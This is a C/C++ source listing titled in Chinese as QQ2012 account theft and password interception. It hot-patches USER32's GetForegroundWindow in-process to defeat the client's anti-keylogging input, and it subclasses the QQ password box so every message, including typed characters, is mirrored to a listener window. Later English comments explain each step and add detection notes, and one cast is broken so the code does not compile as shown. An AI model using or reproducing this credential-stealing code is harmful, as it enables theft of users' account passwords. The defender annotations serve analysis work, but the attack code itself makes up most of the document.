QQ2012客户端盗号,截取密码

/*
 * 修改GetForegroundWindow函数,使得QQ进程不能得知自己成为前台窗口,这样就不会发送干扰输入了;同时修改密码窗口的窗口过程,以便监听
*/

// Overwrites the entry of USER32!GetForegroundWindow, in the process this code
// runs in, with a 5-byte jmp to a freshly allocated stub consisting of `ret`.
// According to the page's own header comment, the purpose is to keep the QQ
// process from learning that it has become the foreground window, so that it
// does not send its interfering input around the password field.
//
// Returns TRUE unconditionally: none of the API results are checked, and the
// page protection changed by VirtualProtect is never restored.
//
// Defender notes: the artefacts left behind are (1) a small private
// PAGE_EXECUTE_READWRITE allocation, (2) a system-DLL code page switched to
// writable+executable, and (3) an E9 (jmp rel32) as the first byte of an
// exported user32 function, pointing outside any loaded module. Comparing the
// in-memory code of system DLLs with the on-disk image exposes (3); a process
// that enables the dynamic-code mitigation policy (ACG) would make (1) and (2)
// fail.
BOOL CalePatchAddr()
{
	// Address of the export inside the current process's user32 mapping.
	FARPROC FuncAddr = GetProcAddress(GetModuleHandle(_T("USER32.DLL")), "GetForegroundWindow");
	// Replacement body: return immediately. No return value is set, so callers
	// receive whatever happens to be in the return register.
	byte HookCode[] = {0xC3/*ret*/, 0x90/*nop*/, 0x90, 0x90, 0x90};

	// Private read/write/execute region that holds the stub.
	LPVOID CodeAddr = VirtualAlloc(0, 5, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
	memcpy(CodeAddr, HookCode, 5);

	// Make the first 5 bytes of the target function writable. oData receives
	// the previous protection but is not used again.
	ULONG oData;
	VirtualProtect(FuncAddr, 5, PAGE_EXECUTE_READWRITE, &oData);
	byte NewCode[] = { 0xE9 /*jmp*/, 0, 0, 0, 0 };
	// rel32 displacement = destination - (source + 5). The arithmetic is done
	// on DWORDs, i.e. the listing is written for 32-bit addresses.
	DWORD off = (DWORD)CodeAddr - (DWORD)FuncAddr - 5;

	memcpy(&NewCode[1], &off, 4);
	// Overwrite the function's first 5 bytes with the jmp.
	memcpy(FuncAddr, NewCode, 5);

	return TRUE;
}

// Original window procedure of the subclassed Edit control. InstallHook stores
// it here and WndProc2 chains to it so the control keeps behaving normally.
WNDPROC pswd_proc = NULL;
// Window to which WndProc2 mirrors every message. It is never assigned
// anywhere in this listing, so the receiving side is not shown on the page.
HWND recv_hwnd = NULL;

//监听窗口过程
// Replacement window procedure installed on the password Edit control by
// InstallHook. Every message the control receives is first copied, unfiltered,
// to recv_hwnd with SendMessage and then passed to the original procedure, so
// the control's behaviour towards the user does not change.
//
// Defender notes: because all messages are mirrored, whatever reaches the
// control as window messages (including character input) is visible to the
// receiver. The observable artefact is a control whose window procedure
// address lies outside the module that registered its window class.
LRESULT CALLBACK WndProc2(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
	// Mirror the message to the listener window (synchronous call).
	SendMessage((HWND)recv_hwnd, message, wParam, lParam);
	// After the message has been observed, hand it to the original window procedure.
	return ::CallWindowProc(pswd_proc, hWnd, message, wParam, lParam);
}
// Finds the top-level window with class "TXGuiFoundation" and title "QQ2012",
// takes its first child of class "Edit", saves that control's window procedure
// in pswd_proc and replaces it with WndProc2. Shows a message box and returns
// early if either window is not found.
//
// Defender notes: GWL_WNDPROC can only be changed for a window that belongs to
// the calling process, so this routine presupposes that the code already runs
// inside the client process (presumably as an injected module; the page does
// not show how it gets there). Keeping untrusted code out of the process is
// therefore the relevant control; once it is inside, the control's message
// traffic is readable.
void InstallHook()
{
	HWND QQ_hwnd = ::FindWindow(_T("TXGuiFoundation"), _T("QQ2012"));
	if (QQ_hwnd == NULL)
	{
		AfxMessageBox(_T("QQ not found!"));
		return;
	}

	// First child window of class "Edit"; the listing treats it as the password box.
	HWND pswd_hwnd = FindWindowEx(QQ_hwnd, 0, _T("Edit"), 0);	//: MsgBox hwnd_qq_psw
	if (pswd_hwnd == NULL)
	{
		AfxMessageBox(_T("pswd HWND not found!"));
		return;
	}
	// Replace the password box's window procedure in order to observe its input.
	// NOTE(review): as extracted, this cast has no target type, so the listing
	// does not compile as shown.
	pswd_proc = reinterpret_cast(GetWindowLong(pswd_hwnd, GWL_WNDPROC));


	// The result is stored in ret but never checked or used.
	long ret = SetWindowLong(pswd_hwnd, GWL_WNDPROC, (long)WndProc2);
}
